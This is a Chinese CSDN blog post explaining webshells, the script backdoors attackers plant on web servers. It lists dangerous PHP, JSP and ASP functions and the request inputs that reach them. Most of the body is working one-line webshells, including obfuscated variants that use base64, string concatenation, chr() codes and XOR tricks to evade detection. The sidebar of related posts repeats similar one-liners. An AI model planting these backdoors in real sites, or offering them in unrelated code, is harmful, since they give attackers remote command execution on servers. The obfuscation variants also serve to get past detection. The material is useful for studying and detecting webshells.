webshell详解

最新推荐文章于 2024-05-29 13:35:05 发布
最新推荐文章于 2024-05-29 13:35:05 发布
阅读量3.9k 收藏 19
点赞数 1
文章标签: 网络安全 php web 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w17791476027/article/details/132083982
版权

Webshell详解

一、 Webshell 介绍

  1. 概念

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门文件,得到一个命令执行环境,以达到控制网站服务器的目的。

从字面上来说,webshell单词可以拆成web和shell。其中web即服务器所开放的web服务。Shell即命令执行环境,用户与服务器操作系统交互的接口。即黑客通过网站提供的web服务建立与服务器进行交互的执行环境,从而获取服务器的一些权限,最终达到控制网站服务器的目的。

  1. 简单介绍

一个最简单的 php webshell

<?php system($_GET[1]); ?>

利用该webshell执行任意命令:
在这里插入图片描述

  1. webshell本质

如下任意命令执行类webshell一般由以下两部分组成:

  • 威胁函数;

  • 可控参数;
    在这里插入图片描述

简单总结 ,Webshell的本质其实是威胁函数和可控参数的组合调用,二者缺一不可。

绝大多数webshell都遵循这个原则,理解了这个大原则,也就基本了解了webshell的逻辑。

  1. 威胁函数与可控输入总结(常见)
  • php Webshell威胁函数 :
1 - 命令执行类函数:
exec,passthru,shell_exec,system,popen,proc_open,expect_popen,pcntl_exec,ssh2_exec,
php_check_syntax,virtual,escapeshellcmd
 
2 – 执行代码段函数
assert,eval,create_function,runkit_function_add,runkit_function_redefine   
 
3 – 回调类函数
call_user_func,call_user_func_array,array_diff_uassoc,array_diff_ukey,
array_filter,array_intersect_uassoc,array_intersect_ukey,array_map,
array_reduce,array_udiff,array_udiff_assoc,array_udiff_uassoc…
 
4 – 文件包含函数
include, require, require_once, include_once
  • php webshell 可控输入:
$_GET
$_POST
$_COOKIE
$_REQUEST
$_FILES
$_SERVER
  • jsp webshell 威胁函数(类)

1 - 命令执行:
java.lang.Runtime.getRuntime().exec()
java.lang.ProcessBuilder.start()
java.lang.ProcessImpl //私有类,需要使用反射加载
ScriptEngineManager().getEngineByName().eval() //ScriptEngine(实现与js交互)执行脚本
ELProcessor().eval() //tomcat el表达式
ELManager().getExpressionFactory().createValuexpression() //ELProcessor的eval的底层实现
java.beans.Expression.getValue() //java.beans.Expression命令执行
jdk.jshell.jshell.builder().build().eval() // Java 9 使用 JShell 命令执行
 
2 - 类加载:
java.lang.ClassLoader
java.net.URLClassLoader
 
3 - 反射:
Class.forName("{威胁函数}")
 
4 - 反序列化:
XMLDecoder().readObject()  // 类似weblogic xml 反序列化漏洞
 
5 - jndi注入:
com.sun.rowset.JdbcRowSetImpl
  • jsp 可控输入:
1 - Request(HttpServletRequest)的可控参数种类:
getParameter, getQueryString, getParameterNames,
getInputStream, getReader, getParameterMap, getContentLength,
getParameterValues, getHeader,
getHeaders, getParameterMap, getHeaderNames, getRequestedSessionId, getCookies, getAttribute, getAttributeNames,
getContentLengthLong
 
2 - 其他参数类型:
URLConnection(HttpURLConnection)
Response(HttpServletResponse)
pageContext
  • asp webshell 威胁函数
eval
execute
executeGlobal
(wscript.shell).exec()
  • asp 可控输入:
request()
Request.BinaryRead()

php 函数库参考文档:https://www.php.net/

java 类方法参考文档:https://tool.oschina.net/apidocs/apidoc?api=jdk-zh

二 、 基础常见webshell案例

  1. PHP webshell 类
  • “一句话webshell” 类
<?php eval($_POST['1']);?>
 
<?php assert($_REQUEST["c"]);?>
 
<?php system($_POST['1']);?>
 
<?php shell_exec($_GET['1']);?>
  • create_function 函数使用
<?php $ant=create_function("", base64_decode('QGV2YWwoJF9QT1NUWyJhbnQiXSk7'));$ant();?>
  • 字符拼接类
<?php
$s0="e";
$s1="val($";
$s2="_";
$s3="P";
$s4="O";
$s5="ST";
$poos=$s0.$s1.$s2.$s3.$s4.$s5."[mima]);";
$pp=@eval($poos);
@eval($pp);
?>
  • ascii码隐藏特征字符
<?php
$a="chr";
$b=$a(97).$a(115).$a(115).$a(101).$a(114).$a(116);
echo $b;
$b($_POST['cmd']);
?>
  • preg_replace 函数 /e 特性使用
<?php
$a = $_REQUEST['id'];
preg_replace('/.*/e',' '.$a,'');
?>
  • include 文件包含
<?php
@include($_GET['bug']);
?>
  • 异或逻辑运算隐藏特征字符
<?php
#$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
#$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$_=(''^'`').(''^'`').(''^'`').(''^'`').(''^'`').(''^'`'); // $_='assert';
$__='_'.('{'^'+').('/'^'`').(''^']').(' '^']'); // $__='_POST';
echo $__;
$___=$$__;
$_($___[_]); // assert($_POST[_]);
?>
  1. asp webshell类
  • eval 执行任意命令
<%eval request("qt")%>
  • execute 执行任意命令
<%
dim a(5)
a(0)=request("404")
eXecUTe(a(0))
%>
  • COM组件命令执行
<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c "&request("qt")).stdout.readall%>
网络给个机会
关注
  • 1
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
获取Webshell的常用方法(一)
Captain_RB的博客
12-03 9689
Webshell是以php、asp、jsp等网站脚本文件形式存在的一种网页后门,攻击者可以利用web请求的方式,获得webshell,控制网站服务器,进而进行执行命令、上传下载文件等操作。本文主要介绍在渗透测试过程中获取Webshell的基本思路,实战中还需就地取材,灵活应对。
Web Shell 简介(Web Shell 第 1 部分)
简介
02-18 1274
多通宵写文章,额不会编了 目录前言持久远程访问特权升级发动攻击僵尸Web Shells 101 使用 PHP(Web Shells 第 2 部分)系统执行shell_exec直通反引号 前言 Web shell是攻击者使用的恶意脚本,目的是升级和维持对已经受损的 Web 应用程序的持久访问。Web shell本身不能攻击或利用远程漏洞,所以它总是攻击的第二步(这个阶段也称为post-exploitation)。 攻击者可以利用常见的网页漏洞,如SQL 注入、远程文件包含 (RFI),甚至使用跨站点脚本
网络安全-webshell详解(原理、攻击、检测与防御)
m0_59162248的博客
12-13 4380
Webshell是通过服务器开放的端口获取服务器的某些权限。webshell又称脚本木马,一般分为大马、小马、一句话木马。大马,体积大、功能齐全、能够管理数据库、文件管理、对站点进行快速的信息收集,甚至能够提权。小马,一般而言,我们在上传文件的时候,会被限制上传的文件大小或是拦截的情况,那么我通过小马来上传大马,实现我们想要的功能。一句话木马,短小精悍、功能强大、隐蔽性好、使用客户端可以快速管理webshell
webshell及木马详解
金色%夕阳的博客
04-24 5524
webshell简介 什么是webshell ,一句话木马是什么样的 <?php @eval($_POST[cmd]);?> 怎么对木马进行免杀(绕过) 异或变形,关键字拼接,加密,编码等方式 文件上传 文件上传有哪些可以利用的点 前端校验 js 禁用js 或者 burp抓包后改名将.jpg改为.php 后端校验MIME类型。 更改Content-Type为Content-Type: image/jpeg 文件后缀黑名单 寻找其他可解析后缀 利用.user.ini .htaccess 利用%
分享几个PHP的webshell免杀思路
最新发布
2401_84466225的博客
05-29 1272
ps:远程获取的时候,其实也可以用fopen读取远程文件,更加方便点,但是感觉这个函数貌似比较常用,可能会被一些waf或者查杀工具查到,所以用到了远程获取的地方,分别使用了fopen函数和curl进行。
什么是webshell 常见的webshell工具有哪些
qq_44005305的博客
10-16 1588
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。常见的webshell编写语言为asp、jsp和php。本文将以php Webshell为示例,详细解释Webshell的常用函数、工作方式以及常用隐藏技术。
常用的WebShell管理工具
美奇软件开发工作室
10-13 2887
1、中国菜刀(Chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UNICODE方式编译,支持多国语言输入显示。 官网:http://www.maicaidao.co/ 2、蚁剑(AntSword) AntSword是一个开放源代码,跨平台的网站管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。 github项目地址:https://
php后门拿下当前目录
aici0819的博客
03-26 369
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
php 实现webshell
echo_heng的博客
12-15 2274
php实现webshell主要依靠swoole和ssh2扩展,前端展示页面使用xterm 废话不多说直接上代码 后端代码 <?php /** * websocket服务器(使用swoole) * 使用ssh登录服务器 */ class Ws{ private $shell; private $connection; private $isConnection; private $ws; public function __construct(){
什么是Webshell
美奇软件开发工作室
10-13 3942
一、什么是Webshell? 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站目录下正常的网页文件混在
如何通过非数字与字符的方式实现PHP WebShell详解
12-12
一般来说,我们所写的webshell通常都会包含数字或字母。比如说下面这样: <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])){ eval($_GET['shell']); } 但如果你想要绕过WAF的话,你还得使用一些...
一文详解Webshell1
08-03
一、Webshell为何备受黑客青睐 二、Webshell常用的PHP函数 三、黑客如何隐藏Webshell 四、Webshell如何使用
一个ASP.Net下的WebShell实例
10-27
【ASP.Net WebShell详解】 在网络安全领域,WebShell是一种恶意代码,它被黑客用来远程控制受害者的Web服务器。本文将详细解析一个特定的ASP.Net WebShell实例,它主要用于执行CMD命令,利用ASP.Net用户较高的权限...
JSPwebshell
08-21
**JSP Webshell详解** 在IT安全领域,Webshell是一个重要的概念,特别是对于网络安全和渗透测试人员来说。本文将深入探讨JSP Webshell的相关知识,包括它的定义、用途、工作原理以及如何检测和防范。 **1. JSP ...
JSP webshell免杀——JSP的基础
weixin_46601374的博客
06-29 1703
唉,每次开启JSP都要好一会儿。话说我也不知道为啥,我的每次开启条件一次比一次苛刻。一开始必应就可以打开,再后来只能由谷歌打开,现在可好了得开着代理用谷歌才能进去。在标记符号之间声明变量,定义方法以及定义类。 标记符号的内容习惯上放在JSP 页面指令之后,之前,也可以写在与之间。之间声明的变量在整个JSP页面内都有效,与标记符在JSP页面中所在的书写位置无关,但习惯上把 标记符写在JSP页面的前面。●一个JSP页面可以...
Webshell基础详解
ch_ycc的博客
03-21 954
全程“特洛伊木马”,之寄宿在计算机里的一种非授权的远程控制程序,它可以在计算机管理员未发觉的情况下我,开放系统授权、泄露用户信息给个记者,是黑客常用的工具之一。
webshell使用与流量分析(含数据包)
hackzkaq的博客
04-29 3908
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员-逍遥子 一、菜刀 1.使用方法 菜刀的使用简单,将一句话木马上传到目标,然后直接使用菜刀连接即可,菜刀主要可以对目标进行虚拟终端,文件操作,数据库操作等。 2.流量分析 1.当菜刀和服务器连接后:最开的的两次流量通信,便产生了大量的数据信息。且使用了base64的方式进行编码 2.对数据解码,发现第一的数据是获取设备的信息,第二段数据是写入了一段新的木马,对第二段的base64编码进行转码整理后得到; @ini_set("displa
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
Webshell管理工具
weixin_59872639的博客
01-15 1万+
中国蚁剑 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。 中国蚁剑的核心功能 Shell代理功能 Shell管理 文件管理 虚拟终端 数据库管理 插件市场 插件开发 中国蚁剑的简单使用 环境需求 windows攻击机,装有蚁剑 windows靶机,有phpstudy环境 步骤1:写一个简单的一句话木马 <?php @eval($_POST['123456'])
webshell 攻击
07-28
Webshell攻击是指攻击者利用Web漏洞获取Web服务器的权限,并上传Webshell后门,从而实现对服务器的控制和操控。Webshell可以被用来执行命令、上传下载文件、修改文件权限等操作,给攻击者提供了广泛的控制权。 为了防御Webshell攻击,需要采取一系列的安全措施。首先,应该加强对Web应用程序的安全性,包括及时更新和修补漏洞、使用安全的编程实践、限制文件上传的类型和大小等。其次,应该加强对服务器的安全配置,包括限制对敏感文件和目录的访问权限、禁止执行可疑的脚本和命令、监控服务器日志等。此外,还可以使用防火墙和入侵检测系统来监控和阻止Webshell的上传和执行。 另外,用户也应该养成良好的使用习惯,避免点击可疑的链接和下载未知来源的文件,定期更改密码,并使用强密码和多因素身份验证等措施来保护自己的账户安全。 总之,防御Webshell攻击需要综合考虑安全措施,包括加强Web应用程序和服务器的安全性,以及用户的安全意识和使用习惯。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [网络安全-webshell详解(原理、攻击、检测与防御)](https://blog.csdn.net/lady_killer9/article/details/120286817)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门)](https://blog.csdn.net/weixin_43263566/article/details/128748547)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [网络攻击之WebShell](https://blog.csdn.net/qq_44887910/article/details/126701405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值